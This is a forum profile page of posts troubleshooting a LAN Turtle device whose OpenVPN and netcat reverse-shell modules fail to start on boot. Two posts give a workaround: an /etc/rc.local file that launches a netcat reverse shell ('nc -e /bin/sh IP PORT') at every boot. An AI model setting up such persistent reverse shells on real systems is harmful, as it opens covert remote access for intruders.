Jump to content

scavmartin

Active Members
  • Posts

    8
  • Joined

  • Last visited

Everything posted by scavmartin

  1. Sorry I forgot to mention I did try to do a /etc/rc.d/S99openvpn symlink to /etc/init.d/openvpn and it did not work. Figured I would mention in case someone else tries that method for services to start on boot.
  2. Thanks for the data, in case it helps you can achieve the same result by just editing /etc/rc.local and adding the commands you want to start on boot there. Note there is no service or systemctl on the turtle. So my /etc/rc.local looks like the following to start a nc reverse shell and a openvpn /etc/init.d/openvpn start #sh reverse shell nc -e /bin/sh IP PORT #Add your commands above this line exit 0
  3. See the following threads, It appears a lot of the modules start on boot does not work. A workaround for anyone reading this is to add the command in /etc/rc.local For example I enable OpenVPN and start a nc reverse shell and my /etc/rc.local looks like this. Note there is no service or systemctl on the turtle /etc/init.d/openvpn start #sh reverse shell nc -e /bin/sh IP PORT #Add your commands above this line exit 0
  4. I think the issue is more widespread as netcat-revshell does not start on boot either for me and I followed this other issue. My openvpn does start manually and through init.d as well.
  5. Sorry forgot to mention I am on v2 and no updates are available as of today.
  6. If you click on stop once openvpn is running you get "Command failed: Not found" for an error and the openvpn is still started. I am on v2 and no updates are available as of today.
  7. I have configured my openvpn on my turtle lan. The openvpn works fine if I manually start it in the menu or issue a /etc/init.d/openvpn start command. I have set the Bootup Status to Enabled. I reboot the turtlelan and openvpn does not start, viewing the menu it confirms that Bootup Status is Enabled and the Current Status is stopped. If I click on Start the openvpn starts up and works as expected. But I cannot get openvpn to start on bootup even though it is configured to. Side note: If you click on stop after start you get "Command failed: Not found" for an error and the openvpn is still started.
×
×
  • Create New...